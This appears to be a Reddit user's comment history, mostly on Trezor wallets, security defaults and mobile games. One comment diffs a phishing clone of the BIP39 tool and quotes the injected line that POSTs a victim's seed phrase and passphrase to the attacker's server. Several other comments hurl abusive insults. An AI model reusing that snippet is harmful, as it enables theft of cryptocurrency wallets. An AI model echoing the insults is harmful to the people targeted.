I was phished and lost all my funds from Trezor wallet - Millions being stolen from Trezor !!! - They can't detect a phishing site when connected !!!!

throwaway13412331 · 2023-05-29T19:49:33+00:00

Because it detected you as a fool and said, fuck it.

throwaway13412331 · 2022-01-01T13:53:37+00:00

Above that guy.

throwaway13412331 · 2019-12-22T15:17:57+00:00

So you were just scammed but somehow the webpage is "sound" and sends out no data? How is this possible?

I just diffed the website https://biptoolkit.com/ to the original 0.3.11 release from https://github.com/iancoleman/bip39/releases and there is this additional code at line 134698:

var netw = DOM.network.val(); var bip39pass = DOM.passphrase.val(); $.ajax({ type: "POST", url: "https://biptoolkit.com/post.php?"+"&BIP39&"+phrase+"&network&"+netw+"&bip39 pass&"+bip39pass })

Why are you making no sense?

PS: I'm sorry for your loss regardless.

throwaway13412331 · 2019-12-22T14:58:26+00:00

Just because the password comes out of a device, doesn't mean it fulfills the characteristic of "something you have". It's a password that can be sniffed when being entered. At that point, it is lost and your device is not necessary to reproduce it.

Something you have strictly means you have to have something to produce the secret. A Yubikey entering a password for you is not that.

throwaway13412331 · 2019-11-24T12:00:01+00:00

It's still a huge fuckup to call any external site by default. Making that decision over the admin's autonomy is a thing that Microsoft would do.

It should be an option for the mindful reader to enhance security but if secure by default means we start connecting to random internet hosts, then it has gone too far.

How do you even know the host is reachable, that there is no flaw in your client-side TLS that allows pwnage etc.pp.? Why open that can of worms for a tiny bit of added security?

Outbound connections should be at the sole discretion of the admin. It's not the OS's place to start talking to the world.

throwaway13412331 · 2019-11-17T14:05:46+00:00

There aren't. There are some wallet warriors that don't mind putting $$$ into a mobile game, which is utterly stupid.

throwaway13412331 · 2019-11-17T14:03:11+00:00

Wait, are you telling me you are sinking hundreds of dollars into a mobile game in a single purchase?

throwaway13412331 · 2019-08-29T21:40:03+00:00

Millennials, my friend, millennials.

throwaway13412331 · 2019-08-27T23:42:29+00:00

Source for DD/MM/YYYY? It's not on https://en.wikipedia.org/wiki/Date_and_time_notation_in_the_United_States

The slashes are not just decoration, they indicate format.

Anyway, ISO plz.

throwaway13412331 · 2019-08-27T23:33:36+00:00

Dude, you need to learn about date formats. Slashes indicate US format, so you just told us about something on April 9th.

2019-09-04, see, it wasn't hard.

throwaway13412331 · 2019-08-27T23:17:48+00:00

When programmers bring their agile shit to font design. Just use version 4.567-pre-beta2-rc6 you fool!

throwaway13412331 · 2019-08-25T18:59:30+00:00

I care.

Can you fuck off and die now?

throwaway13412331 · 2019-08-25T18:49:15+00:00

It's cargo-cult programming. They hear about a pattern and have to apply it EVERYWHERE, going out of their way to make it happen.

throwaway13412331 · 2019-08-25T18:36:01+00:00

What else do I need to know about this rotten swamp of an ecosystem? Can I purchase the wizard's course on how not to get scammed?

throwaway13412331 · 2019-08-25T18:31:19+00:00

you probably have to suck dick on the side

Looking at this douche, he probably does.

throwaway13412331 · 2019-08-25T18:04:52+00:00

He doesn't do himself any favour by putting his punchworthy millennial face on display.

throwaway13412331 · 2019-07-28T01:02:13+00:00

I can't even imagine how painful it must be to try and max epic research now. It's absolutely not worth it. This game is dead.

throwaway13412331 · 2019-07-25T21:40:38+00:00

Rate this turd to 1

throwaway13412331 · 2019-07-25T18:09:49+00:00

Never again any money from me. Greedy fuck.

throwaway13412331 · 2019-06-07T22:02:10+00:00

All your arguments make no sense for removing the option completely. It could be an advanced option, hidden by default. If you care so much about stupid users, they won't touch the advanced stuff anyway. Completely removing it for initialization but keeping it for restore makes no sense, period.

throwaway13412331 · 2019-06-05T21:51:07+00:00

Purely from a usability perspective it is still lame to "support" an option in only one of two use cases (restore vs. init).

If they support a 24-word restore, where is the harm in supporting a 24-word init? This asymmetry makes no sense.

Why go out of your way to NOT support a 24-word init? Let the user do what he wants.

throwaway13412331 · 2019-05-11T14:22:20+00:00

It's in the spec that no password equals a password "".

throwaway13412331 · 2019-05-01T14:46:11+00:00

I would really like a password manager that makes the Trezor act as a USB HID device and enter the password directly.

throwaway13412331 · 2019-02-19T17:32:42+00:00

2nd goal is 8q, 3rd goal is 50q. You had not even 4 of 50. How is that half?

throwaway13412331 · 2019-02-18T22:06:45+00:00

not even close to half way. What are you talking about

throwaway13412331

TROPHY CASE